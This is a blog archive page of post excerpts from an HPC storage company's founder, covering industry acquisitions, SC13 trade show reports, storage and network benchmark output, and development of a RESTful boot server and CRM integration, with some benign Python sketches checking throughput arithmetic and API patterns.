Strange question. It’s really more a question about block storage in general than about FC in particular, but I have a sense that FC may be the first to go down, as it were. Ok … I’ve been looking up mechanisms to help customers in a media editing environment. Their preferred file system depends, to a degree, upon IP over FC for connectivity. They need to interconnect Mac OSX machines, Linux and Windows machines to the same storage resources.
Posts
The end of an era
Posted to the xfs list:
```
SGI is stepping out of maintainer roles for xfs, xfsprogs, xfsdump, and xfstests. This removes me from the MAINTAINERS entry.

Signed-off-by: XXXXXXXXXXXXXX
---
[SGI will continue to host oss.sgi.com as a repository for the XFS open source git trees, mailing list, and documentation as is provided today. And will also continue to participate in a less formal role.]

Thanks!
-Ben

 MAINTAINERS | 1 -
 1 file changed, 1 deletion(-)
```
SGI, the original creator of xfs almost 20 years ago, is removing itself from the pathway going forward.
Posts
Updates: been busy, but here are a few
We’ve sold our first Unison storage cloud to replace an Isilon unit for a bioinformatics core. Performance and density matter, and we have both. About to deploy next phase of cloud for one of our partners … Setting up an exciting trade show presence … Working on an extension of what we’ve been wanting to build for a long time … and now it looks like it’s in reach. Oh … my … this is huge …
Posts
The state of HPC tier 1 vendors
Much has been happening in the HPC tier 1 vendor space. Some of it has made the news, much has not. The TL;DR version: I believe that most of the tier 1 HPC capability may have been wiped out over the last few months. One tier 1 vendor and a bunch of tier 2 vendors are left. Basically, the HPC market has a number of tiers within it, and product mixes across these tiers.
Posts
Lyrical offspring
I can’t name her, at her request, but this is my progeny singing for her high school battle of the bands. They took second place.
Fantastic job, offspring of mine!
Posts
The changing face of storage
Over at InsideHPC, Rich pointed to a blog post by Henry Newman about the changing face of SSD. I’d argue that it’s not just SSD, but storage in general. But Henry, as usual, nails it. Henry opines
To a degree, we see them at least investing in the technologies behind the up market devices. At “worst” acquiring them. Because as Henry points out
Very much so. Look at Seagate and WD with their micro NAS appliances.
Posts
On those annoying full page non-scrollable javascript ads on pages
Guys, please, seriously, stop that. They don’t work on mobile or desktop devices when the window size is smaller than the area required to see the [X] Close button. Whoever came up with this, it is a bad idea. Stop it now. Before I get pissed off enough to write a web proxy that specifically filters out such stupidity, or purposefully renders that to an offscreen invisible layer which is forced to be non-modal.
Posts
An offer for the day job's customers in financial services
See here. TL;DR version: A free month on Lucera’s cloud.
Posts
OCP thoughts
I didn’t post a response to the article written a little more than a year ago claiming that OCP had “blown up the server market”. Yes, that was really in the title. I’ll ignore most of the obvious issues with this, but let’s review a year later, shall we? Open hardware designs are great in concept. Share your design with the world, and lower your customers costs … er … whoops.
Posts
IBM's sale of x86 servers and networking to Lenovo
I’d waited a while before posting on this for a number of reasons, not the least of which was I was quite busy. But also, I wanted to understand what was and was not sold. Now that some of the dust has settled, and both companies have publicly discussed this, we know pretty well what is included in the sale. I don’t need to get into that aspect, you can read it all very succinctly on Lenovo’s site.
Posts
The last straw for us for gluster
We’ve had customers migrating off of it for the past few years, as bugs have gone un-addressed, reports closed, and discussions cut off or ignored. It’s costing us too much in support time and effort now. It’s time to pull the plug. I like many things about gluster. Really I do. I’ve been a strong proponent of it long before it was cool to do so, as the design was in line with what I thought was needed to build scale out file systems.
Posts
We had a record setting, knock the barn doors down year last year
… and believe it or not, I forgot to mention it. This is the first time in company history that we had a backlog going into Q1. Orders being built and tested on the last work day of the year. We grew, not the amount we had originally forecast, but we understand why (and sadly have little control over that aspect). We are working very hard on our appliances … I am blown away as to how perfect a fit they are for folks.
Posts
Something has been bugging me about the CentOS absorption by Red Hat
I am obviously not a lawyer, and I’ve not consulted one. Feel free to point out my mistakes, and note that this is not legal advice. You need to speak to a lawyer on that, I am just guessing. The language here is pretty clear as to what Red Hat owns. I have no problem with their ownership of it. Nor do I have a problem with them imposing their particular concept of ownership.
Posts
Yay, latest Java update broke Supermicro remote console
JRE 7 u 51. Self signed Java console applet. Let the hilarity begin. I tried uploading our own cert and key to the unit. No luck. It’s the applet that needs to be re-signed. This is the joyous message that awaits:
Of course, the IPMIview tool sorta kinda works, though it’s useless for remote support ops. It doesn’t set off the signing issue. Mebbe they ignore signing? Which is worse … the self signed cert, or the signature ignoring app?
Posts
An analytical takedown, gone awry
See here, which is the response to the arXiv article here. While the Facebook data scientists refer to their post as a debunking, using an irrelevant metric (enrollment vs Google rank? and the theory behind this is … what?), the paper points out something quite important. Social networking success has been largely ephemeral, and not sustainable. It’s a transient phenomenon. Anyone remember Friendster? MySpace? More to the point, the internet entities that dominated 15 years ago are largely gone.
Posts
When bugs attack ... the case of the ever expanding VirtualBox image
So I’ve got a Mac Mini and a Linux machine on my desk at work. I am trying hard to use the Mac Mini for day to day stuff, but the sheer broken-ness of the keyboard (yes, really) for Macs is driving me near batty. I am trying though. (Hint to Apple: You aren’t better at everything, and most especially not keyboards and interfacing to higher quality Logitech keyboards, you almost completely fail … don’t even get me started on mice …).
Posts
CentOS™ merges with Red Hat
See this page for more. Inclusive of this merging is a new set of requirements for using the word CentOS. Since we ship an updated and modified kernel, and we update and modify packages to reflect our needs, we are going to have to alter our “CentOS derived distribution” statement. Or switch to another distribution. It’s an annoyance, but maybe it’s time to revisit the distribution scenario. I see nothing wrong with using Debian as the basis, and building from there.
Posts
Blocking hacker probes
I honestly no longer even write a nice note to their ISP. I just tend to block the whole ISP from reaching our site(s). It’s easier, and lower pain for us. It definitely saddens me that we have to do this, but I see enough probes in our logs that I have to.
Posts
Fixed the IPoIB performance issue
For our Unison Parallel File Systems Appliance:
```
[root@unison-jr4-2 ~]# iperf -c 10.3.1.1
------------------------------------------------------------
Client connecting to 10.3.1.1, TCP port 5001
TCP window size: 1.00 MByte (default)
------------------------------------------------------------
[ 3] local 10.3.1.2 port 48383 connected with 10.3.1.1 port 5001
[ ID] Interval       Transfer     Bandwidth
[ 3]  0.0-10.0 sec  13.5 GBytes  11.6 Gbits/sec
```
and of course in parallel
```
[root@unison-jr4-2 ~]# iperf -c 10.3.1.1 -P2
------------------------------------------------------------
Client connecting to 10.3.1.1, TCP port 5001
TCP window size: 1.
```
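A small arithmetic check on the single-stream iperf line: 13.5 GBytes in 10 seconds only comes out to the reported 11.6 Gbits/sec if the byte figure is binary (2^30 bytes per GByte) while the bit rate is decimal (10^9 bits per Gbit). The function name below is illustrative, and the GB/s figure is just the same rate restated in decimal bytes.

```python
GIB = 2**30  # iperf's "GBytes" in this output, per the arithmetic below


def iperf_rate_gbits(transfer_gbytes: float, seconds: float) -> float:
    """Convert a binary-GByte transfer over an interval to decimal Gbits/sec."""
    return transfer_gbytes * GIB * 8 / seconds / 1e9


rate = iperf_rate_gbits(13.5, 10.0)
naive = 13.5 * 8 / 10  # if GBytes were decimal, this would be the rate instead

print(f"{rate:.1f} Gbits/sec (matches the reported 11.6)")
print(f"{naive:.1f} Gbits/sec (decimal reading, does not match)")
print(f"{rate / 8:.2f} GB/s (decimal)")
```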
Posts
A network we can work with ...
A Unison file system appliance connected with Infiniband and 10GbE.
```
[root@unison-jr4-2 ~]# qperf 10.3.1.1 rc_bi_bw
rc_bi_bw:
    bw  =  9.7 GB/sec
[root@unison-jr4-2 ~]# qperf 10.3.1.1 ud_lat ud_bw
ud_lat:
    latency  =  3.66 us
ud_bw:
    send_bw  =  4.9 GB/sec
    recv_bw  =  4.9 GB/sec
```
and of course, IPoIB
```
[root@unison-jr4-2 ~]# qperf 10.3.1.1 tcp_bw tcp_lat
tcp_bw:
    bw  =  474 MB/sec
tcp_lat:
    latency  =  13.4 us
```
which, if you run the same thing over a pair of good 10GbE ports …
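The gap between native RDMA traffic and IPoIB in these qperf numbers is easy to put into ratios. This sketch assumes qperf’s GB and MB are decimal units and that the `rc_bi_bw` figure is the sum of both directions (which is consistent with the roughly 4.9 GB/s one-way `ud_bw` result); the constant names are illustrative.

```python
# Figures copied from the qperf output; units assumed decimal.
RC_BI_BW = 9.7e9      # rc_bi_bw, bytes/s, assumed to be the sum of both directions
UD_LAT = 3.66e-6      # ud_lat, seconds
TCP_BW = 474e6        # IPoIB tcp_bw, bytes/s
TCP_LAT = 13.4e-6     # IPoIB tcp_lat, seconds

rc_per_direction = RC_BI_BW / 2   # one-way RDMA bandwidth
bw_ratio = rc_per_direction / TCP_BW
lat_ratio = TCP_LAT / UD_LAT

print(f"RDMA per direction:      {rc_per_direction / 1e9:.2f} GB/s")
print(f"RDMA vs IPoIB bandwidth: {bw_ratio:.1f}x")
print(f"IPoIB vs UD latency:     {lat_ratio:.1f}x")
```

Under those assumptions, IPoIB TCP here delivered roughly a tenth of the one-way RDMA bandwidth at several times the latency.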
Posts
M&A continues ... Xyratex bought by Seagate
The story is in the Register. An immediate question, and one of somewhat deja vu (all over again) … what is the impact upon Lustre IP? Xyratex had announced that it obtained ownership of the Lustre IP from Oracle a few months ago. This IP was in the form of trademarks, and a number of related bits. Now Xyratex has been bought. And if it keeps the Lustre HPC bits, it will be directly competing with its customers.
Posts
The evolving market for HPC: part 1, recent past
I’ve said this many times, and at many different venues. HPC drives downmarket, and does so very hard. High cost solutions have limited lifetimes, at best. At worst, they will not catch on. 2013 was the year of the accelerators. We predicted this many years ago. I won’t beat this dead horse (for us). I’ll simply say “we were right”, and right with great specificity and accuracy. This seems to be a pattern with us.
Posts
Prognostications for 2014 from an expert
Not me. Henry Newman at Enterprise Storage Forum. See article here. His first prediction of more consolidation in the SSD space is a given. I’ve been arguing that for a while. On the fab side, there are what … four producers left? Toshiba/Sandisk, Samsung, Intel/Micron, Hynix? Did I miss anyone? Will any of them leave (voluntarily or otherwise)? I think the SSD space that will really consolidate is on the SSD-as-a-rack-appliance side, as well as on the card side.
Posts
M&A: Avago grabs ... LSI ... ?
Avago, a spinout from Agilent which was a spinout from HP, just bought LSI. Avago is largely a supplier of components to a variety of industries, dealing with modules, optoelectronics, etc. If you look at their product mix, you see effectively zero overlap with LSI. They are not even in, arguably, the same markets. I am scratching my head over this one. I could see it as a play to gain a foothold into the storage space.
Posts
First new Unison product sold
We were showing off the Unison units at #SC13, and while on the show floor, we managed to sell a storage cluster. Well, technically, the sale occurred after the show (last week in reality), but most of the configuration back and forth was during the show. I can’t say anything about the configuration or stack on it … yet … but you’ll be hearing about it fairly soon. It’s one we talk about quite a bit.
Posts
Violin's (and other pure flash array vendors) post IPO struggles continue
There’s a story on The Register right now about Violin Memory losing its CTO. But that’s not the real interesting story. In the article, Chris Mellor does a pretty good job of laying bare the issues around Violin.
There are several different threads running through this. First, they don’t have much real software IP. Their hardware IP is a different story, but fundamentally, we’ve found that it’s best to have a very simple and effective hardware design, coupled with intelligent software.
Posts
The most popular data analytics language
… appears to be R
[ ](http://revolution-computing.typepad.com/.a/6a010534b1db25970b019b00077267970b-popup)
This is in line with what I’ve heard, though I thought SAS was comparable in primary or secondary tool usage. This said, it’s important to note that in this survey, we don’t see mention of Python. Working against this is that it is a small (1300-ish) self-selecting sample, and the reporting company has a stake in the results. Also of importance is that R is a package with an embedded programming language, and Python is a programming language with add-ons.
Posts
And the SC13 video from InsideHPC is up
As usual, Rich and the team at InsideHPC have done a tremendous job. If you don’t know InsideHPC and its sibling, InsideBigData, I highly recommend both publications. They are on my go-to list as information sources/summaries. The video shows a well caffeinated Joe, talking through our new products. The problem for us was there simply wasn’t sufficient time to go into detail on everything. Which is a shame IMO, but one we’ll look at rectifying later.
Posts
The 60 second guide to big data by gogrid
The GoGrid folks have put together a nice marketing slide on big data, in the sense that they are explaining the features of it without explaining it, or how/where they fit. It’s implied that they provide all you need for Big Data, but it’s their points along the way that make a great point for the day job and especially our new Fast Path Big Data Appliances. Our argument has always been that you can’t approach Big Data with last millennium’s architecture.
Posts
Big data languages: the reason for the tests
In a number of recent articles, I’ve seen/read that “Python is displacing R”, and other similar things. Something about this intrigued me, as I had heard many years ago that “Python was displacing Perl”. Only, it wasn’t. And others are questioning the supplantation premise quite strongly. It seems that there is little actual evidence of this. Mostly hyperbole, guesses, and dare I say, wishful thinking. It seems that this is modus operandi for Python advocates, and their latest object of attention is R.
Posts
Riemann zeta function in parallel/vector data languages
Continuing the work of the previous post, I looked into rewriting the serial code to run in parallel/vector data languages. My original supposition about what would make a good data language is now in doubt as a result. First, I used PDL in Perl. But it’s Perl, right? It can’t possibly be fast. That would be … like, I dunno … wrong? (yes, this is sarcasm). This completes the task in 12s.
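The PDL code isn’t shown in this excerpt, so the following is a hypothetical Python sketch of the two shapes being contrasted for the truncated zeta series ζ(s) ≈ Σ_{k=1}^{n} k^(-s): a serial loop that accumulates one term at a time, and a single whole-range reduction, which is the form a vector data language such as PDL or NumPy evaluates in bulk. In pure Python the second version is not actually vectorized or parallel; it only shows the shape. `math.fsum` is used to keep rounding error down.

```python
import math


def zeta_serial(s: float, n: int) -> float:
    """Partial sum of the Riemann zeta series, accumulated term by term."""
    total = 0.0
    for k in range(1, n + 1):
        total += k ** -s
    return total


def zeta_reduction(s: float, n: int) -> float:
    """The same partial sum written as one reduction over the whole index range."""
    return math.fsum(k ** -s for k in range(1, n + 1))


n = 100_000
print(zeta_serial(2, n), zeta_reduction(2, n), math.pi ** 2 / 6)
```

For s = 2 both should approach π²/6, with a truncation error of roughly 1/n.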
Posts
Knights Landing
Over at InsideHPC, Rich has a short take on Knights Landing with a link to the longer article. This is implicitly the direction I thought things would be going in … drop in replacement CPUs to provide acceleration. Probably some big-small designs to handle OS tasks on specific cores (and reduce OS based jitter). This said, 2x such sockets gets you to 72 lanes of PCIe gen 3. A little light for us, but we’ll figure something out (our current units are more than this).
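To put the “72 lanes of PCIe gen 3” figure in bandwidth terms, here is a small arithmetic sketch. It assumes PCIe gen 3’s 8 GT/s per lane with 128b/130b encoding, reports per-direction decimal GB/s, and ignores packet and protocol overhead, so real throughput lands lower. The function name is hypothetical.

```python
def pcie3_bandwidth_gbytes(lanes: int) -> float:
    """Per-direction PCIe gen 3 bandwidth in decimal GB/s, before protocol overhead."""
    gt_per_s = 8.0          # 8 GT/s per lane
    encoding = 128 / 130    # 128b/130b line code efficiency
    return lanes * gt_per_s * encoding / 8  # bits -> bytes


per_socket = pcie3_bandwidth_gbytes(36)
both = pcie3_bandwidth_gbytes(72)
print(f"{per_socket:.1f} GB/s per socket, {both:.1f} GB/s for two sockets")
```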
Posts
... and OCZ goes down
See here. This is a Chapter 7 (dissolution), not a Chapter 11 restructuring. Assets are to be sold, likely to Toshiba.
I expect more of these from other vendors. The SSD space has needed consolidation for a while. With STEC purchased by WD and Smart by Sandisk, most of the high end of the market has been removed from the startup side. Pliant was grabbed by Sandisk previously. Who else remains? On the low-to-midrange of the market, you have Intel, Micron, and a few others.
Posts
I guess no one at the beobash saw the 10% discount link ...
If you go to this site, provide your information, and use the code “beobash13”, you get a nice discount on your next purchase from Scalable Informatics until the end of 2013. The rules are simple: you provide your contact information, let us know what products you want to talk about, and buy and pay for them by the end of the year. We are offering something like a 10% discount for this.
Posts
Finally have a customer information page talking directly to Zoho CRM
This took a bit, as the API is documented but wasn’t quite working for some reason. But now we’ve linked our signup page to drop data directly into Zoho. This was made harder by the XML-based API not working as documented. I posted a forum note, after searching the forum for answers. Others had the same questions. I built some simple test code, and it didn’t work. Posted this to the forum.
Posts
SC13: the Limulus boxen appear
[Disclosure: we do have a business relationship with Basement Supercomputing] (this is a longer version of the beowulf item I posted) Years ago, I came to the conclusion that there was no personal supercomputing market after we tried with a deskside system … what I called a “muscular desktop” with a great deal of IO, processing, ram, and graphics. We just could not find the right niche for this, and we were being badly undercut in price by the Dell-like companies of the world, selling low end boxes that were … good enough … for a small set of tasks.
Posts
SC13 observations
From a post to the beowulf list:
I didn’t get a chance to see many booths … I did get free the last hour of Thursday to wander, and made sure I got to see a few people and companies. What I observed (and please feel free to challenge/contradict/offer alternative interpretations/your own views) will definitely be colored by the glasses we wear, and the market we are in.
Not so many chip companies (new processor designs, etc.)
Posts
SC13 finale
That was a wonderful show. People got to see what we were about, our new appliances, our performance. I see many possibilities. This is good. Some key takeaways:
We have the fastest, densest systems on the market. Our usable performance far outpaces our nearest competitors’ configurations, which are not in a reasonable config (hello … 60+ raw JBOD? Or RAID0 … seriously? And no one has challenged them on this?). Our partners rocked.
Posts
SC13: Day 2 wrap up
Day 1 was incredible. Day 2 topped day 1 by a fair amount. I realized yesterday that I had forgotten to put up our speedometer website, which pulled data directly from the siFlash hardware on the real IO performance. I had this unit running hard, and the IO operations were moving quite well. So I put up the web page on my laptop, and this is what we saw: 30 GB/s.
Posts
An apology
When I mess up, I don’t normally do it in a small way. I jump in hard, head first. I made an assumption about something I did not have all the facts about today, and began to tear into someone who did not deserve this treatment, after making him wait for me at our booth. Yeah, this was a major screw up on my part. Addison, I hope you will forgive me, and accept my humble apology.
Posts
SC13 day 1 wrap up
A good day at the booth. The talks were well attended, and speakers and their topics were interesting. Our partners in the booth: Kx, Veristorm, Basement Supercomputing, Sandisk, XtremeData, and Inktank are phenomenal. We announced many new products, all on display at our booth, and the partners working with us on these products were there to talk about the applications. What we didn’t show off were the speedometers measuring the performance live on the systems.
Posts
Interesting article
I read this on Gigaom. In it, there is a claim of the densest storage on the market coming from Quanta, and a full rack of them would be about 3/4 ton (about 682 kg). Amazon uses a “special” design that comes in more than a ton according to the article. So I decided to look into what a simple 42U rack of say 10 of our bad boys would come out with weight wise.
Posts
Broken APIs and other time wasters
So I spent the day trying to figure out why my simple form submission, which generated an XML output and then a subsequent post to Zoho CRM, did not, in fact, work. I was doing this without the Zoho code, just a description of their API. It’s an older API, that much is obvious. You talk to it through XML. You post your XML, but you put parameters on the URI to control the post.
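The pattern described here, an XML document in the POST body with control parameters carried on the URI, can be sketched with Python’s standard library. This is a minimal sketch under stated assumptions: the endpoint URL, the query parameter names (`scope`, `authtoken`) and the element names (`row`, `FL`) are hypothetical placeholders, not a verified copy of Zoho’s schema, and nothing here actually sends a request.

```python
# Hypothetical sketch: XML payload in the POST body, control parameters on the URI.
# Endpoint, parameter names and element names are placeholders, not Zoho's documented API.
from urllib.parse import urlencode
from urllib.request import Request
import xml.etree.ElementTree as ET


def build_record_xml(module, fields):
    """Serialize a dict of field name -> value into a one-row XML document."""
    root = ET.Element(module)
    row = ET.SubElement(root, "row", no="1")
    for name, value in fields.items():
        field = ET.SubElement(row, "FL", val=name)
        field.text = str(value)
    return ET.tostring(root, encoding="unicode")


def build_post_url(base_url, params):
    """Attach control parameters to the URI as a query string."""
    return base_url + "?" + urlencode(params)


def build_request(base_url, params, xml_body):
    """Prepare (but do not send) a POST that carries the XML body."""
    return Request(
        build_post_url(base_url, params),
        data=xml_body.encode("utf-8"),
        headers={"Content-Type": "application/xml"},
        method="POST",
    )


if __name__ == "__main__":
    body = build_record_xml("Leads", {"Company": "Acme", "Last Name": "Smith"})
    req = build_request("https://crm.example.com/xml/Leads/insertRecords",
                        {"scope": "crmapi", "authtoken": "YOUR_TOKEN"}, body)
    print(req.get_method(), req.full_url)
    print(body)
```

Keeping the URL construction and the body construction in separate functions makes it easy to log exactly what goes on the wire, which is usually the first thing to compare against the vendor’s documentation when a post silently fails.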
Posts
Sneak peek at UI atop RESTful API
This is our new, common UI across all machines, clusters, clouds, appliances, tiburon/Scalable OS … This one in particular is running atop our siRouter. More on that soon, but have a little gander.
![](/images/SOS-v1.png)
The UI is basically a “thin” layer atop the RESTful interface. And it’s a proper RESTful interface, none of this conflated GET where we mean POST/PUT and all that. More at SC13. I promise.
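To illustrate what “not conflating GET with POST/PUT” means in practice, here is a hypothetical in-memory collection where each HTTP verb has exactly one meaning: GET only reads, POST creates with a server-chosen ID, PUT creates or replaces at a client-chosen ID, and DELETE removes. The class and method names are invented for this sketch; it is not Tiburon’s actual code, and it leaves out the HTTP server itself.

```python
# Hypothetical sketch of verb-to-operation mapping; not Tiburon's actual code.
class ResourceCollection:
    """In-memory collection where each HTTP verb has exactly one meaning."""

    def __init__(self):
        self._items = {}
        self._next_id = 1

    def handle(self, method, item_id=None, body=None):
        """Dispatch a request; returns (status_code, payload)."""
        if method == "GET":
            # Safe: GET only reads, never creates or modifies.
            if item_id is None:
                return 200, list(self._items)
            if item_id in self._items:
                return 200, self._items[item_id]
            return 404, None
        if method == "POST" and item_id is None:
            # Create a new member; the server chooses the ID.
            new_id = str(self._next_id)
            self._next_id += 1
            self._items[new_id] = body
            return 201, new_id
        if method == "PUT" and item_id is not None:
            # Idempotent create-or-replace at a client-chosen ID.
            created = item_id not in self._items
            self._items[item_id] = body
            return (201 if created else 200), item_id
        if method == "DELETE" and item_id is not None:
            if item_id in self._items:
                del self._items[item_id]
                return 204, None
            return 404, None
        return 405, None  # method not allowed for this target
```

Because GET never mutates state, a UI layered on top can cache or retry reads freely, and repeating a PUT leaves the collection in the same state, which is the practical payoff of keeping the verbs distinct.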
Posts
kvm incompatible with xfs
Just found this out by way of an experiment for a partner. Cool partner, cool product, running on our fast hardware for SC13. Problem is that I was seeing some very odd error messages when I tried to mount a volume stored in a file on an xfs based LUN. I could dd to the file. I could mkfs.ext* the /dev/vda. But the moment I tried to mount it, block errors.
Posts
BeoBash13: the revenge of the rampaging physics-turned-supercomputer geeks?
Or something like that. See here. We’ll be there!
Posts
SC13 T-14 days
We will be at booth 1919. Please do come by and say hello. We’ll have coffee/tea (I think), a number of machines, great partners with a number of demos, and hopefully some talks on big data analytics in Financial Services, Parallel high performance databases, massive key-value storage and processing, as well as a few other bits. We’ll have a very cool box from one of our friends in the booth. We ship the machines at the end of this week, or beginning of next.
Posts
And then they fight you
We’ve been championing the tightly coupled storage and computing model for a long time. When it was unfashionable, when it was discarded as “this is something you should not do” by others “who knew better”. Now, the ideas, the concepts, the thoughts, the designs and implementations behind it are all around. Joyent’s Manta system is an implementation of the concept. Arguably, the more advanced MapReduce and Hadoop designs are also implementations … have the data right next to the processing, and provide gargantuan bandwidth locally to the data.
Posts
Cray acquires the IP assets and people of Gnodal
We used Gnodal units for the original Lucera system. Very nice devices with a few idiosyncrasies. Gnodal ran into some funding problems earlier this year, and had to find a buyer. Cray grabbed them and a number of the people involved. This is good for Gnodal and Cray. Gnodal has interesting technology. And Cray may be looking at how to leverage SDN for its system using this (wild guess on my part, I have no knowledge direct or indirect of their plans/intentions/…).
Posts
First distributed file system for STAC M3 benchmarks
We ran the STAC M3 on a Ceph based storage cloud appliance you will be hearing more about soon. The report should be up on the STAC site later this week. Here are some of the take-aways:
We chose Ceph for several reasons, but you should expect to see others very soon as well. Our Cluster and Cloud storage appliances are based upon our very powerful and very dense building blocks.
Posts
At the STAC Summit in NYC, presenting our Time Series Analytics Appliance
This was a good meeting in general. Lively panelists, focused panels, though somewhat vendor heavy in a number of cases. I have a sense of a “Gandhi” experience in progress from the parallel file systems panel. 4 vendors, one user. The user was fantastic, and the vendors were pushing most of their own stuff. One vendor in particular took some not too thinly veiled shots directly at us without naming us.
Posts
But, of course
So I ran out of space on my travel laptop’s small SSD. I wanted to upgrade to a larger SSD, and I figured I’d move my partitions over and resize. But the gods would not allow such an operation as they have in the past. Oh no. Upon switching out the 120 GB Intel SSD for the 240 GB SSD (a spare unit we had), and putting the 120 GB SSD into a USB 3 holder, I discovered that a) the drive wouldn’t register with the machine most of the time (it errored out during SCSI plugin detection), or b) when it did detect properly, it wouldn’t provide partitions I could copy off.
Posts
Our little time series analytical appliance is one fast monster
Running some burn in testing:
Run status group 0 (all jobs):
READ: io=523296MB, aggrb=12093MB/s, minb=12093MB/s, maxb=12093MB/s, mint=43274msec, maxt=43274msec
WRITE: io=523296MB, aggrb=7469.4MB/s, minb=7469.4MB/s, maxb=7469.4MB/s, mint=70059msec, maxt=70059msec
More soon
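fio’s `aggrb` figure is the aggregate bandwidth, which should come out close to total IO divided by run time. A quick sanity check on the summary above can be sketched as below; the regular expression assumes the older fio summary format shown in the burn-in output and would need adjusting for newer fio releases, which print bandwidth differently.

```python
import re

# One READ/WRITE record from a fio "Run status group" summary (older fio output format).
RECORD = re.compile(
    r"(READ|WRITE): io=([\d.]+)MB, aggrb=([\d.]+)MB/s.*?maxt=(\d+)msec"
)


def check_aggregate(summary):
    """Map each operation to (reported aggrb in MB/s, io / maxt in MB/s)."""
    results = {}
    for op, io_mb, aggrb, maxt_ms in RECORD.findall(summary):
        results[op] = (float(aggrb), float(io_mb) / (int(maxt_ms) / 1000.0))
    return results


SUMMARY = (
    "READ: io=523296MB, aggrb=12093MB/s, minb=12093MB/s, maxb=12093MB/s, "
    "mint=43274msec, maxt=43274msec "
    "WRITE: io=523296MB, aggrb=7469.4MB/s, minb=7469.4MB/s, maxb=7469.4MB/s, "
    "mint=70059msec, maxt=70059msec"
)

if __name__ == "__main__":
    for op, (reported, derived) in check_aggregate(SUMMARY).items():
        print(f"{op}: reported {reported:.1f} MB/s, io/maxt {derived:.1f} MB/s")
```

For this run the derived figures are about 12092.6 MB/s for reads and 7469.4 MB/s for writes, within rounding of the reported values, so the numbers are self-consistent.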
Posts
This week past has been (mostly) incredible
I’m not happy about my time away from my family, or about Vipin’s time away from his, but we still accomplished a great deal. There are some unhappy things I still have to deal with, and I will soon. But this has been a great week. Look for some announcements around the SC13 show. We will have some nice things to talk about at our booth (#1919; please do come and visit us there, we will have coffee, snacks, as well as our team, partners, and friends there!)
Posts
And the benchmarks are out
Check out the official site for more info. Take-home messages for the soon-to-be-announced system:
and
What is this magical beast you ask? What are its configuration limits? You’ll have to wait for the official unveiling.
Posts
New benchmark results imminent
Will update once they are released. I can’t tell you numbers within. I can say that we are quite happy with the results. More (very) soon. I promise.
Posts
Heh ...
[ ![](/images/eunuch programmers.jpg)
](http://www.businessinsider.com/scott-adams-favorite-dilbert-comics-2013-10)
Posts
This would be funny if it weren't sad
Over on the pfSense mailing list there is a serious level of tin-foil-hat (TFH) and rampant paranoia, coupled with an extreme lack of etiquette on the part of the TFH brigade. And, to make it more enjoyable, at least one overt and humorous case of attempted cyber bullying against me personally for imploring people to stop hijacking a technical discussion list, as well as people decrying a faux oppression by people who genuinely want the list to return to its technical roots.
Posts
Starting to build the Tiburon Data Store
This is fun, basically something that I’ve wanted to do, and it gets me closer to the point where I’ve wanted to be for a while … building TREDS (Tiburon REliable Data Store). Code is up in the IDE, and I am building the CRUD and metadata portions now. If all goes well (it never does), we should be storing/retrieving objects soon. Very exciting …
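As a rough illustration of what “CRUD and metadata portions” of an object store involve, here is a toy in-memory sketch that keeps each object’s bytes alongside a small metadata record (size, SHA-256 digest, modification time). The class name and the chosen metadata fields are assumptions for this example only; this is not the TREDS code.

```python
import hashlib
import time


class ObjectStore:
    """Toy in-memory store: create/read/update/delete plus per-object metadata."""

    def __init__(self):
        self._data = {}
        self._meta = {}

    def create(self, key, payload):
        if key in self._data:
            raise KeyError(f"object {key!r} already exists")
        self._write(key, payload)

    def read(self, key):
        return self._data[key]  # raises KeyError if absent

    def update(self, key, payload):
        if key not in self._data:
            raise KeyError(f"object {key!r} does not exist")
        self._write(key, payload)

    def delete(self, key):
        del self._data[key]
        del self._meta[key]

    def metadata(self, key):
        return dict(self._meta[key])  # copy so callers cannot mutate internal state

    def _write(self, key, payload):
        payload = bytes(payload)
        self._data[key] = payload
        self._meta[key] = {
            "size": len(payload),
            "sha256": hashlib.sha256(payload).hexdigest(),
            "mtime": time.time(),
        }
```

Recomputing the digest on every write keeps the metadata consistent with the stored bytes, so a later read can be verified against it; a persistent store would need to make the data and metadata writes atomic together, which this sketch does not attempt.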
Posts
More benchmarking goodness coming
A new round of industry-standard benchmarks is coming soon for some of our kit. Well, it’s technically our appliance built from that platform, but you’ll be hearing more on that soon. Very exciting times …
Posts
Moving more of our infrastructure to our dog food ...
Many of our functions are hosted on our Virtualization appliance. Our firewall is now running on a siRouter appliance. As always, our internal storage is JackRabbit, and our internal backup is DeltaV. We’ll be talking more about all of this in short order. Needless to say, I am quite pleased about this. [update] Spoke too soon … discovered a routing failure that was masked in the appliance. Reverting to the old setup until we can address it.
Posts
Wonderful changes in Tiburon-RESTful
I’ve been rewriting Tiburon to provide a completely sane RESTful interface. It still does what it did before, but now … it does it so much more nicely! First: I got rid of the config file. Some folks were having trouble with JSON config files. Creating them is very easy; they are key-value stores in 90% of the cases, with the remaining 10% being a “default” key, and then the value.
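For readers unfamiliar with the config shape described above, here is a minimal sketch: mostly plain key/value pairs, plus a key whose value is an object with a `"default"` entry and optional per-host overrides. All key names and values are hypothetical, chosen only to illustrate the structure; they are not Tiburon’s actual config keys.

```python
import json

# Hypothetical config: plain key/value pairs, plus one key whose value carries
# a "default" entry and per-host overrides. Key names are illustrative only.
CONFIG_TEXT = """
{
  "boot_server": "192.0.2.10",
  "image_dir": "/srv/images",
  "kernel": {"default": "vmlinuz", "node07": "vmlinuz-test"}
}
"""


def lookup(config, key, host=None):
    """Return a plain value, or the host-specific value falling back to "default"."""
    value = config[key]
    if isinstance(value, dict):
        return value.get(host, value["default"])
    return value


config = json.loads(CONFIG_TEXT)
```

Here `lookup(config, "kernel", "node07")` picks the override, while any other host (or no host) falls back to the `"default"` entry.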
Posts
RESTful tiburon tagged
as Alaskan Malamute v0.10. I’m a dog guy, what can I say. Hopefully full boot server semantics will be done by end of weekend.
Posts
Starting to really enjoy using MongoDB as a document store
There are a few gotchas that I am working through. But apart from these (mostly oddities in the interface between Perl and MongoDB), this is making Tiburon RESTful development go much better. I’ve just started to scratch the surface of what the combined thing will do.
landman@lightning:~/work/development/tiburon/t$ ./version.pl
result = $VAR1 = '{ "version" : "0.1", "label" : "Alaskan Malamute" }';
and
landman@lightning:~/work/development/tiburon/t$ ./list_boot_servers.pl
result = $VAR1 = ' [ { "hostport" : "3001", "_id" : "523d540e9745f48429000000", "name" : "test1", "default" : "false", "hostname" : "10.
Posts
Ahhh ... the joy that is being used as a 2 by 4
I didn’t quite see this one in all its glory, but had an inkling that things were not as they appeared to be. Annoying, but one lives, learns, and continues. No details.
Posts
... and Nirvanix shutters ...
